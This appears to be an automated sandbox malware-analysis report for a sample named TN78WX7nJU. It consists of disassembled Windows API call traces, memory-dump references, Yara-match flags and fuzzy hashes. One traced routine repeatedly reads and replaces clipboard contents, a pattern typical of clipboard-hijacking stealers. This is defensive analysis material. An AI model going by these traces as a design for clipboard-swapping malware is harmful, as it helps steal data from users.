                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                                                                • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 009BB076
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215370096.00000000009BA000.00000040.00000020.00020000.00000000.sdmp, Offset: 009BA000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9ba000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                • Instruction ID: 4cc3ddc033a05aed7b5a182f550953b4d46242bfe524d62016cc217289326633
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E113F79A00208EFDB01DF98CA85E99BFF5AF08350F058094F9489B361D371EA50DF80
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0248194D
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00001541), ref: 02481957
                                                                                                                                                                                                                                                                  • Part of subcall function 0248CE77: _strlen.LIBCMT ref: 0248CE8E
                                                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 02481984
                                                                                                                                                                                                                                                                • GetClipboardData.USER32(00000001), ref: 02481994
                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 024819B0
                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 024819DF
                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 02481B23
                                                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 02481B39
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000001), ref: 02481B46
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 02481B70
                                                                                                                                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 02481B79
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 02481B80
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 02481BA4
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000002D2), ref: 02481BAF
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                                                • String ID: 4#E$i
                                                                                                                                                                                                                                                                • API String ID: 4246938166-2480119546
                                                                                                                                                                                                                                                                • Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                                                                                                                                                                                • Instruction ID: b978c31468590a52dea869d75f85652d3b4ea07be727883c63709c40da631531
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A512431C107949AD311AFA4EC45BFD7774FF2A306F04522BD809A6162EB709686CB69
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0248239C
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 024823B1
                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 024823B8
                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(00646464), ref: 024823CB
                                                                                                                                                                                                                                                                • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024823EA
                                                                                                                                                                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0248240B
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 02482416
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000008,00000000), ref: 0248241F
                                                                                                                                                                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02482443
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 024824CE
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 024824E6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1529870607-0
                                                                                                                                                                                                                                                                • Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                                                                                                                                                                                • Instruction ID: a22004ffb4fdee9840a3042c472ed11f56d2906c634f0ab78efc99f85b126369
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3571FD72910228AFDB22DF68DD85FAEB7BCEB09711F0041A5F509E6151DA70AF84CF24
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024BBCF4,?,00000000), ref: 024BBA6E
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024BBCF4,?,00000000), ref: 024BBA97
                                                                                                                                                                                                                                                                • GetACP.KERNEL32(?,?,024BBCF4,?,00000000), ref: 024BBAAC
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                • Instruction ID: 45e7fa293ae2789865667484da2b8d3858e9d66a8975e282e1cd3e857f922556
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE217732E01105AAD7368F55D901BE777A6EF4AE5CB568066ED09D7300F732DA81C370
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
                                                                                                                                                                                                                                                                • GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                • Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: _free.LIBCMT ref: 024B21A0
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21AD
                                                                                                                                                                                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024BBCB5
                                                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 024BBD10
                                                                                                                                                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 024BBD1F
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,024B0A1C,00000040,?,024B0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024BBD67
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,024B0A9C,00000040), ref: 024BBD86
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2287132625-0
                                                                                                                                                                                                                                                                • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                                                • Instruction ID: 4421b78951f844526118e4bf4ae57a2b92a464ca9a4a4e065be02a0366c3c33b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F45170719002099AEB12DFA5DC40AFFB7B9EF1470AF14042FED04E7290EB719A458BB1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                                                                                                                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2287132625-0
                                                                                                                                                                                                                                                                • Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                                                                                                                                                                                • Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: C$C
                                                                                                                                                                                                                                                                • API String ID: 0-238425240
                                                                                                                                                                                                                                                                • Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                                                                                                                                                                                • Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024B0A23,?,?,?,?,024B047A,?,00000004), ref: 024BB353
                                                                                                                                                                                                                                                                • _wcschr.LIBVCRUNTIME ref: 024BB3E3
                                                                                                                                                                                                                                                                • _wcschr.LIBVCRUNTIME ref: 024BB3F1
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024B0A23,00000000,024B0B43), ref: 024BB494
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2444527052-0
                                                                                                                                                                                                                                                                • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                                                                • Instruction ID: 3e2dc4b3e3bc5437148a8995ba2605b51944cf371a231a3a81260aeb0f76472d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C61A371A10606AADB26AB75DC45BFB73A9FF04718F14442FED099B280EBB4D541CBB0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
                                                                                                                                                                                                                                                                • _wcschr.LIBVCRUNTIME ref: 0043B17C
                                                                                                                                                                                                                                                                • _wcschr.LIBVCRUNTIME ref: 0043B18A
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2444527052-0
                                                                                                                                                                                                                                                                • Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                                                                                                                                                                                • Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorInfoLastLocale$_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2834031935-0
                                                                                                                                                                                                                                                                • Opcode ID: cf5f19ddaecfef394eb322faebabd4fba94275e162a49705b2643b4bebb04734
                                                                                                                                                                                                                                                                • Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf5f19ddaecfef394eb322faebabd4fba94275e162a49705b2643b4bebb04734
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0248DAD7), ref: 024AA732
                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0248DAD7), ref: 024AA73C
                                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0248DAD7), ref: 024AA749
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                                                • Instruction ID: c90aa944017c9d2be00a89346e304bdbf72c33aae30d3cec3e4f8b656447afc0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E31C57590132C9BCB21DF69DD88B9DBBB8BF18710F5042EAE40CA7260E7309B858F44
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
                                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                • Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                                                                                                                                                                                • Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,?,024B009C,00000000,00457970,0000000C,024B01F3,00000000,00000002,00000000), ref: 024B00E7
                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,024B009C,00000000,00457970,0000000C,024B01F3,00000000,00000002,00000000), ref: 024B00EE
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 024B0100
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                • Instruction ID: 95932424b35fdc48ef32caea22904eb5f79d0b41f21831d588972a229f0582b9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59E04631000148ABCF126F58DD48A8A3B6AEF02B43F008029F9048B230CB36DA42DE60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0042FE99
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1703294689-0
